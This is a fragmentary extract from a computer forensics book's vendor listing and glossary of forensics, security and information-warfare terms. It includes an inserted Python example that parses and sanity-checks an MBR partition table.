Career Track Program, Corporate, eDiscovery Services, EnCase Enterprise,
EnCase Forensic, EnCase Snapshot, EnCase Legal Journal, EnCE Certification, FastBloc, litigation support, professional services, PSD-IR Program,
training option programs and training
Phone: 626-229-9191
Fax: 626-229-9199
http://www
...
com/
Guidance Software’s Professional Services Division offers expertise in computer forensics and enterprise investigations.

Kroll Ontrack Inc. ... krollontrack...

LC Technology International Inc. ..., Suite 203, Clearwater, FL 33761
Products (software): LC Technology's Forensic Utility Suite: FPRO-DEMO Folder (recovery_demo.html, FPROlicense.exe, help\English\index.txt), PR3-DEMO (PRGUIDemo.exe, PR-license.exe ...com
Support: Support @ LC-Tech.com
Training: Training @ LC-Tech.com
Press: Press @ LC-Tech.com
http://www...co... , Japan, 6-13-11, Mikuni BLDG. ... amij...

ManTech Security & Mission Assurance
12015 Lee Jackson Hwy, Fairfax, VA 22033
Products (software): NwReader/Setup... mantech-ist...

New Technologies, Inc. ...exe, NTA 60...pdf, ntasusb...pdf) and a copy of the NTA Viewer program (NTAVIEW...pdf)
Phone: 503-661-6912
Email: info@forensics-intl... forensics-intl...

secure-data... dataforensics... works primarily with large companies and government agencies in the field of forensic consultation, training, and risk assessment. ... Wacker Dr. ... projectleadership...

Renew Data
9500 Arboretum Blvd. ... renewdata...

Total Recall (BinaryBiz North America)
700 Ken Pratt Blvd. ...zip is a support file and you are not meant to run it directly. ... binarybiz... They count over 80,000 successful recoveries. ... vogon-international... They also have a forensic and investigative department for all sorts of forensic services and training. Reports produced by their investigation service comply with legal requirements for admissibility in court, and they can provide expert witnesses to give evidence.

... This publication has (at times) been considered the premier hacker print product.
Abuse of privilege
Formal nomenclature for user action not in accordance with organizational policy or law.

Acceptable level of risk
A judicious and carefully considered assessment by the appropriate authority that a computing activity or network meets the minimum requirements of applicable security directives.

Acceptable use policy (AUP)
DoD nomenclature for documented standards or guidance on usage of information systems and networked assets.

... With accountability, violations or attempted violations of system security can be traced to individuals who can then be held responsible.

... Accuracy protects against forgery or tampering.

Acme of skill
To subdue an adversary without killing him.

Adapter
A device that serves as an interface between the system unit and a device attached to it, such as a SCSI adapter. Can also refer to a special type of connector.

Ambient data
This is a forensic term that describes, in general terms, data stored in nontraditional computer storage areas and formats. The term is now widely used in the computer forensics community and it generally describes data stored in the Windows swap file, unallocated space, and file slack.

... Phrased another way, anomaly detection begins with a positive model of expected system operations and flags potential intrusions on the basis of their deviation (as particular events or actions) from this presumed norm.

... For example, distribute your latest software package by allowing visitors to download it through an anonymous ftp.

Application
A more technical term for program.

... In the case of an ftp connection, the application gateway appears as an ftp server to the client and an ftp client to the server.

Assurance
A measure of confidence that the security features and architecture of an information system or network accurately reflect and enforce the given security policy.

Attack
With specific regard to IW—a specific formulation or execution of a plan to carry out a threat. An active attack alters data. Whether an attack will succeed depends on the vulnerability of the computer system and the effectiveness of existing countermeasures.

... Experienced soldiers, for example, have negative attitudes toward slovenliness.

... An automated or manual set of chronological records of system activities that may enable the reconstruction and examination of a sequence of events or changes in an event.

Autoresponders
Sends an automated email response to incoming mail sent to a specific address. ...com to get an email explaining your latest product or automatically reply to orders with a prewritten thank you email message.

... Synonymous with trap door. A breach created intentionally for the purpose of collecting, altering, or destroying data.

... See “Monthly Traffic.”

... This can be one, two, or four chips.

Basic psyop study (BPS)
A detailed background document that describes the psyop-relevant vulnerabilities, characteristics, insights, and opportunities that are known about a specific country susceptible to exploitation.

Battlespace
The field of military operations circumscribed by the aggregate of all spatial (geographic range, altitude) and virtual (communicational connectivity) dimensions in which those operations are realized. Components are determined by the maximum capabilities of friendly and enemy forces to acquire and dominate each other on the ground and in the electromagnetic spectrum.

BIOS
The part of the operating system that provides the lowest level interface to peripheral devices.

BLOB
Binary large object used to describe any random large block of bits, usually a picture or sound file; can be stored in a database but is normally not interpretable by a database program. Can also be used to hide malicious logic code.

BMC4I
Battle(space) management command, control, communications, and intelligence. The planning, tasking, and control of the execution of missions through an architecture of sensors, communications, automation, and intelligence support.

... Because the computer gets itself up and going from an inert state, it could be said to lift itself up “by its own bootstraps”—this is where the term boot originates.

... Besides this loader program, the boot record contains the partition table for that disk.

Bootstrap
To load and initialize the operating system on a computer.

Bulletin board
Web-based message forum where visitors can read, post, and reply to messages or questions left by other visitors.

... There are busses both within the CPU and connecting it to external memory and peripheral devices.

C2
Acronym for command and control.

... Abbreviation for command-and-control attack.

C2 counterwar
Presumed synonym for command-and-control counterwar.

C2W
Acronym for command-and-control warfare.

C3I
Acronym for command, control, communications, and intelligence.

C4ISR
Acronym for command, control, communications, computer intelligence, surveillance, and reconnaissance.
Glossary of Terms and Acronyms
Card
A circuit board that is usually designed to plug into a connector or slot.

Center of gravity
A term commonly encountered that connotes a component or feature of a given system (an adversary’s deployed instrumentality) that is critical to either (a) the viability of that given system and/or (b) the viability of the supersystem within which that given system is a participating component.

... Supports others in enhancing the security of their computing systems; develops standardized set of responses to security problems; provides a central point of contact for information about security incidents; and assists in collecting and disseminating information on issues related to computer security, including information on configuration, management, and bug fixes for systems.

... It’s simply a way for your visitor’s computer to communicate with programs, such as shopping-cart scripts, on your server. If you don’t have access to a CGI-BIN directory, you can’t run programs (scripts) on your Web site.

CIP
Acronym for critical infrastructure protection.

Cluster
Windows allocates space to files in units called clusters. A cluster is the smallest unit of disk space that can be allocated for use by files.

... It also supplies a real-time clock that keeps track of the date, day, and time.

Cold boot
Starting or restarting a computer by turning on the power supply.

Computer evidence
Computer evidence is quite unique when compared to other forms of documentary evidence. The legal “best evidence” rules change when it comes to the processing of computer evidence. This situation creates problems concerning the investigation of the theft of trade secrets (client lists, research materials, computer-aided design files, formulas, and proprietary software).

... The field is relatively new to the private sector but it has been the mainstay of technology-related investigations and intelligence gathering in law enforcement and military agencies since the mid-1980s. Typically, computer forensic tools exist in the form of computer software. The use of different tools that have been developed independently to validate results is important to avoid inaccuracies introduced by potential software design flaws and software bugs. Cross-validation through the use of multiple tools and techniques is standard in all forensic sciences. Validation through the use of multiple software tools, computer specialists, and procedures eliminates the potential for errors and the destruction of evidence.

Computer investigations
Computer investigations rely on evidence stored as data and the timeline of dates and times that files were created, modified, and last accessed by the computer user. The computer forensics investigator should consider timelines of computer usage in all computer-related investigations.

Context menu
Also called a “context-sensitive menu,” or a “shortcut menu,” a context menu includes the commands that are commonly associated with an object on the screen.

Cookies
(Internet browser) Holds information on the times and dates you have visited Web sites.

CPU
Stands for central processing unit, a programmable logic device that performs all the instruction, logic, and mathematical processing in a computer.

... Can be said of the operating system or a particular program when there is a software failure.

Customizable missing docs page
By placing a file in your main directory called missing... You can use it to steer visitors to your front page, so you don’t lose them if they click on a bad link somewhere.

... It actually takes the payment information and sends it via the banking gateways to obtain real-time approvals for credit cards and checks.

Data
Representation of facts, concepts, or instructions in a formalized manner suitable for communication, interpretation, or processing by humans or by automatic means. A representation of facts, concepts, or instructions suitable for communication, interpretation, or processing by humans or computers.

Data-driven attack
A form of attack that is encoded in seemingly innocuous data that is executed by a user’s or other software to implement an attack.

Datum
Any numerical or geometrical quantity or set of such quantities that may serve as reference or base for other quantities.

DBA
Acronym for dominant battlespace awareness.

Deception
Those measures designed to mislead the enemy by manipulation, distortion, or falsification of evidence to induce him or her to react in a manner prejudicial to his or her interests.

Defragment
As modern file systems are used and files are deleted and created, the total free space becomes split into smaller noncontiguous blocks. This degrades performance as multiple seek operations are required to access a single fragmented file. ... Access speed will be improved as a result of reduced seeking. A disk should be defragmented before fragmenting reaches 10%.

... This term is often used to denote the general set of service impairments that at the extreme (total degradation to a “zero state” with respect to the given parameters) constitutes an absolute denial of service.
Denial of service
Actions that prevent any part of an automated information system (AIS) from functioning in accordance with its intended purpose. However, the term is most often invoked to connote action against a single host (or set of hosts), which results in the target’s inability to perform services for other users—particularly over a network. It is important to note that denial is delineated with respect to whether the normal end user(s) can exploit the system or network as expected. Forms of attack not geared to denial per se may lead to denial as a corollary effect (when a system administrator’s actions in response to an intrusion attempt lead to a service outage).

Denial time
The average length of time that an affected asset is denied to the organization.

DII
Acronym for defense information infrastructure.

Directed-energy protective measures
That division of directed-energy warfare involving actions taken to protect friendly equipment, facilities, and personnel to ensure friendly effective uses of the electromagnetic spectrum that are threatened by hostile directed-energy weapons and devices.

... It acts as a hierarchy and you will see the directory represented in Windows looking like manila folders.

... The more disk space you have, the bigger your Web site can be.

DMA
Stands for direct access memory. Most devices require a dedicated DMA channel (so the number of DMA channels that are available may limit the number of peripherals that can be installed).

... acmecatapults...

DRAM
Dynamic random access memory (see also “SDRAM”). Dynamic refers to the memory’s method of storage—basically storing the charge on a capacitor.
Driver
A program designed to interface a particular piece of hardware to an operating system or other software.

... This term is also (more loosely) used to connote the topical area or task specialization focusing on achieving this type of protection. A subclassification of IW.

... .01 micrometers) through far infrared (1,000 micrometers).

EIDE
Stands for enhanced integrated drive electronics. See also “IDE.”

Electronic warfare
Any military action involving the use of electromagnetic and directed energy to control the electromagnetic spectrum or attack the enemy.

Electronics intelligence (ELINT)
Technical and geolocation intelligence derived from foreign noncommunications, electromagnetic radiations emanating from sources other than nuclear detonations or radioactive sources.

Email accounts (POP3)
Your email boxes on a server that can be accessed directly to retrieve your mail using such programs as Outlook Express and Netscape.

Email aliases
Your main POP account for your domain allows the system to capture any name that may be sent to your domain name. ...com is proper, any name in front of it will be delivered to your main POP account.

Email forwarding
Any email address at your domain may be configured to forward to any other real internet email address. ...com can forward to you@aol...

Email mini mailing lists
Can be used to send your customers news and updates about your product or services without emailing each one separately. You send one email and it goes to every email address on the list.

Entrapment
The deliberate planting of apparent flaws in a system for the purpose of detecting attempted penetrations.

Executable
A binary file containing a program in machine language that is ready to be executed (run). ...exe for these files.

... See also “Adapter.”

... Typically, to view the contents of a compressed file, you must extract it first.

File
A collection of data grouped into one unit on a disk.

... The FAT is a critical file: you should be sure to back it up regularly. The older FAT (FAT16) can only support partitions up to two gigabytes in size.

File slack
File slack potentially contains randomly selected bytes of data from computer memory. ... Clusters are made up of blocks of sectors. This randomly selected data from memory is called “RAM slack” because it comes from the memory of the computer. Thus, if the computer has not been shut down for several days, the data stored in file slack can come from work sessions that occurred in the past.

Firewall
A metaphorical label for a set of hardware and software components protecting system resources (servers, LANs) from exogenous attack via a network (from Internet users) by intercepting and checking network traffic. For LAN installations of any size, the typical approach is to install one or more computers positioned at critical junctures (gateways) and dedicated to the firewall functions. The firewall’s own internal connection into the protected domain is typically the focus of monitoring functions. The typical firewall is an inexpensive micro-based Unix box kept clean of critical data, with numerous modems and public network ports on it but only one carefully watched connection back to the rest of the cluster.

Firmware
Software contained in a read-only memory (ROM) device.

Fishbowl
A defensive IW tactic in which a suspicious or unauthorized user is permitted to continue established access to the protected system or network, but whose interactions with that system or network are (unknown and unapparent to the subject) encapsulated within a secure domain of operations (rerouted to an isolated computer or redirected to a dummy environment simulating an actual server) so that IW defenders can observe and analyze the user’s intentions, tactics, and identity.
Fog of war
The aggregate of factors that reduce or preclude situational certainty in a battlespace.

... Code that can be written in one line of code on any Unix system; used to recursively spawn copies of itself, explode, and eventually eat all the process table entries.

Formmail
Use formmail to email the contents of forms on your Web page to you when a visitor fills it out.

... Fragmented files are slower to read than unfragmented files.

Friction (of war)
The aggregate of factors and events that reduce or degrade operational efficiency (and hence effectiveness) in the real world of war-making.

FrontPage extensions
FrontPage is Microsoft’s simple Web-page editor designed for nonprogrammers. ... You should either plan to use CGI-based applications or FrontPage.

Heat Sink
A mass of metal attached to a chip carrier or socket for the purpose of dissipating heat.

... You have unlimited access to your account 24 hours a day.

Hijacking
A term (typically applied in combination with another) to connote an action to usurp activity or interactions in progress.

Global information environment
All individuals, organizations, or systems, most of which are outside the control of the military or national command authorities, that collect, process, and disseminate information to national and international audiences.

Hacker
The label “hacker” has come to connote a person who deliberately accesses and exploits computer and information systems to which he or she has no authorized access. ... “A great hack” was a common compliment for an especially cunning or innovative piece of software code. ... Over time, cracker faded from usage and hacker came to subsume its (unfortunate) connotations.

History
(Internet browser) Stores the internet addresses (URLs) of the Web sites you have visited.

I2WAR
Acronym for infrastructural and information warfare.

... I/O is the communication between a computer and its user, its storage devices, other computers (via a network), or the outside world.

I&W
Acronym for indications and warnings. Typically, indications and warnings connotes a summarization or fusion of raw data into a synopsis of current threat conditions (a report from an intel unit). This label is occasionally used to connote the summarization of incoming data with respect to threat conditions (extant or predicted).

IDE
Stands for integrated drive electronics. See also “EIDE.”

IDW
Acronym for information-dominance warfare.

Indications and warning(s) (I&W)
Those intelligence activities intended to detect and report time-sensitive intelligence information on foreign developments that could involve a threat to the United States or allied military, political, or economic interests or to U.S. citizens abroad.

Indirect information warfare
Changing the adversary’s information by creating phenomena that the adversary must then observe and analyze. Synonymous with second-wave warfare.

... The meaning that a human assigns to data by means of the known conventions used in their representation.

Information Age
A label generally used to connote the present or prospective era in which information technology (IT) is the dominant technical artifact.

Information Age warfare
That subset of war-making that uses information technology as a tool to impart combat operations with unprecedented economies of time and force.

Information attack
Directly corrupting information without visibly changing the physical entity within which it resides.

Information-based warfare (IBW)
Synonym for information warfare.
Information collection
That aspect of IW activities concerned with the acquisition of data. Information collection includes the entry points for information into an organization from both internal and external sources. Business examples of collection systems include point-of-sale (POS) systems, market surveys, government statistics, and internal management data.

Information compromise
That class or type of IW threat that involves a competitor gaining access to an organization’s proprietary data.

... There are two types of denial: direct attacks on the adversary’s information systems, and providing misinformation to its systems to deceive and induce the adversary to take actions that are not to its advantage. Besides direct attacks, there are safer ways to corrupt an adversary’s databases.

Information destruction
That class or type of IW threat to one’s data assets that involves the loss of these data (or loss of access to these data) as the result of a hostile attack by an adversary.

Information dominance warfare (IDW)
The subcategory of information warfare (IW) aimed at leveraging data, information, and knowledge to tactical and strategic advantage, as opposed to leveraging the media, channels, and vehicles of information transfer and processing.

Information function
Any activity involving the acquisition, transmission, storage, or transformation of information.

Information operations (also information ops)
This term is typically encountered in IW discussions as a label for those concrete tasks and activities by which one pursues one’s own interests in the information realm.

Information ops (also “info ops”)
Synonym for information operations.
Information system(s) (INFOSYS)
The entire infrastructure, organization, personnel, and components that collect, process, store, transmit, display, disseminate, and act on information.

... Compromise involves a competitor gaining access to an organization’s proprietary data.

Information systems security
A synonym for INFOSEC.

Information realm
A commonly used term to denote the virtual space of data networks, contents, and commerce.

Information security (INFOSEC)
The protection against unauthorized access to or modification of information, whether in storage, processing, or transit, and against the denial of service to authorized users or the provision of service to unauthorized users, including those measures necessary to detect, document, and counter such threats.

Information superiority
That degree of dominance in the information domain that permits the conduct of operations without effective opposition. It includes the capability for near-real-time awareness of the location and activity of friendly, adversary, and neutral forces throughout the battlespace and a seamless, robust C4I network linking all friendly forces that provides common awareness of the current situation.

... The speed with which this is done affects the timeliness of the data availability and, therefore, the responsiveness of the organization to situations.

Information war
Activities intertwined with, and superimposed on, other military operations, exploiting data and information in support of traditional military tasks such as command and control. Subcategories of information warfare can be differentiated into two general classes: (a) those aimed at leveraging the vehicles of information transfer or processing (information systems warfare [ISW]) and (b) those aimed at leveraging the informative content or effect of such systems.

... IRQ is the name of the hardware interrupt signals that PC peripherals (such as serial or parallel ports) use to get the processor’s attention. Peripherals that use interrupts include LAN adapters, sound boards, scanner interfaces, and SCSI adapters.

... You can provide it just for fun or use it to interact with your customers in real-time.

... When in place, the jumper connects the pins electronically and closes the circuit, turning it on.

Key communicator
An individual or group having the economic, social, or political power to persuade the individuals or groups with which he or she interacts to change or reinforce existing opinions, emotions, attitudes, and behaviors.

... A specialized form of audit trail software, or a specially designed device, that records every key struck by a user and every character of the response that the host computer returns to the user.

... This approach to knowledge explicitly ties it to the processes of both education and inaction with respect to the given operational environment and hence links it to one or more specific actors in that given domain.

Knowledge-based warfare
The ability of one side to obtain essential and key elements of truth while denying these same elements of truth to the other side. The end game is a complete pictorial representation of reality that the decision maker can tune to his or her unique needs at any given time.

Knowledge dominance
In warfare, an operational advantage (vis-à-vis an adversary) in exploiting information to guide effective action.

Knowledge war
A synonym for IW, or third-wave war.

Letter bomb/letterbomb
Malicious or disruptive code delivered via an email message (or an attachment to said message). Under UNIX, a letterbomb can also try to get part of its contents interpreted as a shell command to the mailer.

Logic bomb
The term for a mischievous or destructive piece of software (virus, trojan horse) that lies resident on the victim computer or system until triggered by a specific event (onset of a predetermined date or set of system conditions).

Mail bomb/mailbomb
Unlike a logic bomb (a thing), mail bomb is a verb used to connote deliberately deluging a target system or host with email messages for purposes of harassment, degradation of service, or even denial of service. Any large amount of incoming email sufficient to disrupt or bog down normal local operations.
Majordomo list
This is a very flexible tool for allowing your clients to interact with each other by email. Majordomo lists usually focus on a particular topic of common interest, such as dried flower arranging, forensics, or anything that people can share information or talk about. Each list can email up to 1,500 emails per day.

Measurement and signature intelligence
Scientific and technical intelligence obtained by quantitative and qualitative analysis of data (metric, angle, spatial, wavelength, time dependence, modulation, plasma, and hydromagnetic) derived from specific technical sensors for the purpose of identifying any distinctive features associated with the source, emitter, or sender and to facilitate subsequent identification and measurement of the same.

Message
Any thought or idea expressed briefly in a plain or secret language and prepared in a form suitable for transmission by any means of communication.
Military deception
Actions executed to deliberately mislead adversary military decision makers as to friendly military capabilities, intentions, and operations, thereby causing the adversary to take specific actions (or inactions) that will contribute to the accomplishment of the friendly mission.

Military information function
Any information function supporting and enhancing the employment of military forces.

... It denotes the phenomenon of extreme transformations in warfare occurring as a result of the exploitation of technology.

Minimum essential information infrastructure (MEII)
A label for the least set of own-force information assets that can serve to support a given mission or operation.

... Mirror image backups exactly replicate all sectors on a given storage device. Such backups are sometimes referred to as “evidence grade backups” and they differ substantially from standard file backups and network server backups.

Mockingbird
A computer program or process that mimics the legitimate behavior of a normal system feature (or other apparently useful function) but performs malicious activities once invoked by the user.

... Each time a Web page, image, audio, video, or other element of your Web site is accessed by your visitor, traffic is generated.

... It accepts expansion devices such as sound and network cards and modems.

MTR
Acronym for military technical revolution.
Navigation warfare (NAVWAR)
A term for activities directed toward disrupting, degrading, or denying the adversary’s capabilities for geographical location, tracking, and control (navigation) based on such capabilities.

Netwar
A synonym for cyberwar.

... The reason for doing this is that systems tend to operate within a group of other “trusted” systems. Implied with this trust is that the system administrator of the trusted system is performing his or her job properly and maintaining an appropriate level of security for his or her system.

Network worm
A worm that migrates across platforms over a network by copying itself from one system to another by exploiting common network facilities, resulting in execution of the (replicated) worm on that system and potentially others.

NTFS
Windows NT file system.

OODA loop (also O-O-D-A loop)
Observation, orientation, decision, action loop. Disruption or other damage to the OODA loop is a common way of portraying the goal or main effect of IW.

... Examples include humanitarian and police actions.

Operational intelligence
Intelligence that is required for planning and conducting campaigns and major operations to accomplish strategic objectives within theaters or areas of operations.

Opinion
A view, judgment, or appraisal formed in the mind about a particular matter or particular matters. It may be more influenced by attitudes than facts.

OSINT
Acronym for open-source intelligence.

Packet sniffing
Packet sniffing is a technique in which attackers surreptitiously insert a software program at remote network switches or host computers. By picking up the first 125 keystrokes of a connection, attackers can learn passwords and user identifications, which, in turn, they can use to break into systems.

... Each partition normally has its own file system. The partition table describes to the operating system how the hard disk is divided. The partition table is always stored in the first physical sector of a disk drive.
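The partition table in the first physical sector, as an added example that is not from the book: this parser reads the four 16-byte entries of a classic MBR (assumed layout: table at offset 0x1BE, 0x55AA signature at 0x1FE), verifies the signature before trusting the table, and flags overlapping entries, a sign of corruption or tampering that an examiner would note in the report. The sample sector is constructed for the demo.

```python
"""Parse the partition table in the first physical sector (MBR) of a disk.

Added example, not from the book. Assumes the classic MBR layout: four
16-byte partition entries at offset 0x1BE and the 0x55AA boot signature at
offset 0x1FE. The sample sector built below is constructed for the demo.
"""
import struct
from dataclasses import dataclass

SECTOR_SIZE = 512
TABLE_OFFSET = 0x1BE
ENTRY_SIZE = 16
BOOT_SIGNATURE = b"\x55\xAA"

PARTITION_TYPES = {  # a few common type ids, enough for the demo
    0x00: "empty",
    0x07: "NTFS/exFAT",
    0x0B: "FAT32 (CHS)",
    0x0C: "FAT32 (LBA)",
    0x83: "Linux",
}


@dataclass
class PartitionEntry:
    index: int
    bootable: bool
    type_id: int
    start_lba: int
    sector_count: int

    @property
    def type_name(self) -> str:
        return PARTITION_TYPES.get(self.type_id, f"unknown (0x{self.type_id:02X})")

    @property
    def end_lba(self) -> int:
        # Last sector belonging to the partition (inclusive).
        return self.start_lba + self.sector_count - 1

    @property
    def size_bytes(self) -> int:
        return self.sector_count * SECTOR_SIZE


def parse_partition_table(sector: bytes) -> list[PartitionEntry]:
    """Return the non-empty entries of a 512-byte boot sector.

    Raises ValueError if the sector is the wrong size or lacks the 0x55AA
    signature; checking the signature comes before trusting the table.
    """
    if len(sector) != SECTOR_SIZE:
        raise ValueError(f"expected {SECTOR_SIZE}-byte sector, got {len(sector)}")
    if sector[0x1FE:0x200] != BOOT_SIGNATURE:
        raise ValueError("missing 0x55AA boot signature; not a valid MBR")

    entries = []
    for i in range(4):
        off = TABLE_OFFSET + i * ENTRY_SIZE
        raw = sector[off : off + ENTRY_SIZE]
        # Entry layout: status(1) CHS start(3) type(1) CHS end(3) LBA start(4) count(4)
        status, _chs_start, type_id, _chs_end, start_lba, count = struct.unpack(
            "<B3sB3sII", raw
        )
        if type_id == 0x00:
            continue  # unused slot
        entries.append(PartitionEntry(i, status == 0x80, type_id, start_lba, count))
    return entries


def find_overlaps(entries: list[PartitionEntry]) -> list[tuple[int, int]]:
    """Return index pairs whose sector ranges overlap (corrupt or tampered table)."""
    overlaps = []
    for a in entries:
        for b in entries:
            if a.index < b.index and a.start_lba <= b.end_lba and b.start_lba <= a.end_lba:
                overlaps.append((a.index, b.index))
    return overlaps


def build_sample_sector() -> bytes:
    """Constructed sample MBR: a bootable NTFS partition followed by a Linux one."""
    sector = bytearray(SECTOR_SIZE)
    sample = [
        (0x80, 0x07, 2048, 204800),    # bootable, NTFS, 100 MiB
        (0x00, 0x83, 206848, 409600),  # Linux, 200 MiB, starts right after the first
    ]
    for i, (status, type_id, start, count) in enumerate(sample):
        off = TABLE_OFFSET + i * ENTRY_SIZE
        sector[off : off + ENTRY_SIZE] = struct.pack(
            "<B3sB3sII", status, b"\xFE\xFF\xFF", type_id, b"\xFE\xFF\xFF", start, count
        )
    sector[0x1FE:0x200] = BOOT_SIGNATURE
    return bytes(sector)


if __name__ == "__main__":
    parts = parse_partition_table(build_sample_sector())
    for p in parts:
        flag = "*" if p.bootable else " "
        print(f"{flag} #{p.index} {p.type_name:<12} LBA {p.start_lba}-{p.end_lba} "
              f"({p.size_bytes // (1024 * 1024)} MiB)")
    print("overlaps:", find_overlaps(parts))
```

On a real image the same function is fed the first 512 bytes of the forensic copy; the CHS fields are ignored because modern tools rely on the LBA values.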
... Attack that does not result in an unauthorized state change, such as an attack that only monitors or records data. A type of threat that involves the interception, not the alteration, of information.

... Users often select weak passwords. Password cracking and theft is a technique in which attackers try to guess or steal passwords to obtain access to computer systems. For example, if the password is a dictionary word, a computer can quickly look up all possibilities to find a match. However, even with complex passwords, powerful computers can use brute force to compare all possible combinations of characters until a match is found.

Path
A location of a file. A path can identify a drive (C:\), a folder (C:\Temp), or a file (C:\Windows\ftp...
Penetration
With regard to IW, a successful attack—the
ability to obtain unauthorized (undetected) access to files and programs or the control state of
a computer system
...
Perception
The process of evaluating information that has
been received and classified by the five physical
senses (vision, hearing, smell, taste, and touch)
and interpreted by criteria of the culture and
society
...
In various ways, perception management combines truth projection, operations security, cover and deception,
and psychological operations
...
For example, disks, keyboards, monitors, mice, printers,
scanners, tape drives, microphones, speakers,
and other such devices are peripherals
...
Formed by a play on
both phreaker and hacker
...
When the intrusion or action involves both
telephone and data communications networks, that portion of the intrusion activity
directed toward manipulating the telephone
system is typically called phreaking
...
Commonly, an individual who uses his or her
knowledge of the telephone system to make
calls at the expense of another
...
PnP
cards generally have no switches or jumpers but
are configured via the PnP system’s BIOS or
with supplied software for non-PnP computers
...
Each time a PC
initializes, the BIOS executes a series of tests
collectively known as the POST
...
If a fault is
detected, the POST reports it as an audible series of beeps or a hexadecimal code written to
an I/O port
...
A data-storage device for which
the order of access to different locations does
not affect the speed of access
...
812
Computer Forensics, Second Edition
The most common form of RAM in use today
is built from semiconductor integrated circuits, which can either be static (SRAM) or dynamic (DRAM)
...
Generally, the visitor will see a
different message every time they visit the site
...
Graphical stats are a detailed graphical
and tabular view of your Web site’s traffic
grouped by weeks, days, and hours in an easy-to-read
format
...
Retro-virus
A virus that waits until all possible backup
media are also infected, so that it is not possible
to restore the system to an uninfected state
...
The current
RMA is an instance of a military technical revolution (MTR)
...
Risk
With specific regard to data or information systems—accidental or unpredictable exposure of
information, or violation of operations integrity because of the malfunction of hardware
or incomplete or incorrect software design
...
ROM
Read-only memory
...
The term is most often applied to
semiconductor-integrated circuit memories
...
It is used in
part for storage of the lowest level bootstrap
software (firmware) in a computer
...
Scavenge/scavenging
Searching through object residue (discarded
disks, tapes, or paper) to acquire sensitive data
without authorization
...
For example, a Perl script counts the visits to the
page, and a JavaScript script makes the buttons
change colors when you put your mouse
pointer over them
...
SCSI
Stands for small computer system interface
...
SDRAM
Stands for synchronous dynamic random
access memory (see also “DRAM”)
...
Search engine
A CGI script that allows visitors to perform
keyword searches of a Web site
...
Sector
The tracks on a disk are divided into sectors
...
Secure server (SSL)
One method of ensuring that information entered through your Web site is protected
...
This is most
commonly used for credit card transactions
...
Security audit
A search through a computer system for security problems and vulnerabilities
...
Security classification
A category to which national security information and material is assigned to denote the degree of damage that unauthorized disclosure
would cause to national defense or foreign relations of the United States and to denote the
degree of protection required
...
This is usually done by pointing to an item with the screen pointer and then
quickly pressing and releasing the left mouse
button once
...
A loose descriptor for the scope of
processing for intrasystemic functions to obtain advantage in a theater of operations
...
Some servers even have two or more processors working together
...
Server side includes (SSI)
Allows the server to understand and respond
to special page commands
...
On each page you
put a simple include to read the file and place it
at the bottom of the desired pages
...
Simple counter
Graphical count of visitors to your Web site,
which appears on your Web page
...
Site submission
Submits your site information to a database of
over 1,900 search engines, link engines, and
directories
...
Shopping cart
Keeps track of what your customers have ordered online as they add and remove items
...
SIGINT
Acronym for signals intelligence
...
Signal security (SIGSEC)
A generic term that includes both communications security and electronic security
...
SIGSEC
Acronym for signal security
...
The perception of the elements in the environment within a volume of time and space, the
comprehension of their meaning, and the projection of their status in the near future
...
As such, it connotes a degree of orientation to
those circumstances at that point in time—
particularly those that are germane to the task
itself
...
As such, the notion of situation
awareness maps straightforwardly onto the orientation phase of the OODA Loop
...
Sniff/sniffing
The act of surreptitiously monitoring data
streams so as to intercept and capture exploitable
information
...
A program
to capture data across a computer network
...
A software tool that audits and
identifies network traffic packets
...
This is something of a catch-all category for
any tricks used to obtain the intended access or
to obtain information critical to achieving that
access
...
SOS
Acronym for system of systems
...
This term is also pejoratively applied
to describe the perceived harassment of receiving profligately broadcast data (junk email advertising)
...
Also, to cause a person or newsgroup to be flooded with irrelevant or inappropriate messages
...
System registry
The system configuration files used by Windows 2000, XP, 2003, and NT to store settings
about user preferences, installed software,
hardware and drivers, and other settings required for Windows to run correctly
...
When the registry becomes “broken,” it
can cause serious system problems
...
TECHINT
Acronym for technical intelligence
...
Technical intelligence (TECHINT)
Intelligence derived from exploitation of
foreign materiel, produced for strategic, operational, and tactical level commanders
...
The item is then exploited at succeedingly
higher levels until a countermeasure is produced to neutralize the adversary’s technological advantage
...
Most CGI scripts can be
installed without Telnet unless you need it for
debugging purposes
...
An attacker can send and receive terminal
I/O while a user is on the terminal
...
Usually terminators are hardware circuits or
jumpers
...
The allusion is to Toffler’s “Third Wave” of economic
activity, which concentrates on information
and knowledge as raw material and product
...
Time bomb
A logic bomb that is specifically triggered by a
temporal event (a predetermined date or time)
...
A
variant of the trojan horse, in which malicious
code is inserted to be triggered later
...
Trap door
A hidden software or hardware mechanism
used to circumvent security control
...
The data-storage area in a
factory-fresh hard disk drive typically contains
patterns of sectors that are filled with patterns
of format characters
...
The format pattern is overwritten as files and subdirectories are
written in the data area
...
UUencode
Many file formats are 8-bit (also called binary),
which means the basic unit of information—a
byte—comprises 8 on/off signals
...
UUencoding compensates for this restriction by converting 8-bit
data to 7-bit data
...
The data are then emailed and received by someone who must UUdecode them
...
Vandal
As contrasted with crackers and criminals in a
tripartite taxonomy of cyberspace intruders,
this term is used to denote anyone whose goal
is to destroy information and information systems in the course of their intrusion attempts
...
Video adapter
An expansion card or chip set built into a
motherboard that provides the capability to
display text and graphics on the computer’s
monitor
...
If it is a chip set on the
motherboard, the video connector will be on
the motherboard also
...
In this
usage, the term is synonymous with cyber
medium, cyberspace, and infosphere
...
Virus
The generic label for a unary set of code that is
designed to cause mischief or other subversive
effect in a target computer system
...
War
An event characterized by the open, total, and
(relatively) unrestricted prosecution of warfare
by lethal means
...
War dialer
A cracking tool, a program that calls a given list
or range of numbers and records those that answer with handshake tones (and so might be
entry points to computer or telecommunications systems)
...
The distinction between this
and war ties into the delineation of information warfare as an activity, which could or
should be conducted outside the situational
frame of war itself
...
See also “Cold boot”
...
There’s no need for any other applications or software
...
The storage area is important to the
computer forensics specialist for the same reason that file slack and unallocated space are important (large volumes of data exist of which
the computer user likely has no knowledge)
...
Permanent swap files are of more interest
to a computer forensics specialist because they
normally store larger amounts of information
for much longer periods of time
...
World Wide Web
The World Wide Web, or WWW, is the part of
the Internet that you use to view a particular
Web page
...
Telnet, FTP,
Veronica, and Archie are some other Internet
data-transfer protocols
...
Worm
A class of mischievous or disruptive software
whose negative effect is primarily realized
through rampant proliferation (via replication
and distribution of the worm’s own code)
...
Worm code is relatively host-independent, in
that the code is self-contained enough to migrate across multiple instances of a given platform, or across multiple platforms over a
network (network worm)
...
A program or executable code
module that resides in distributed systems or
networks
...
Such
resources may take the form of CPU time, I/O
channels, or system memory
...
Zip
To zip (notice the lower case z) a file is to compress it into an archive so that it occupies less
disk space
...
When used as a noun, Zip is typically capitalized
...
Zip file
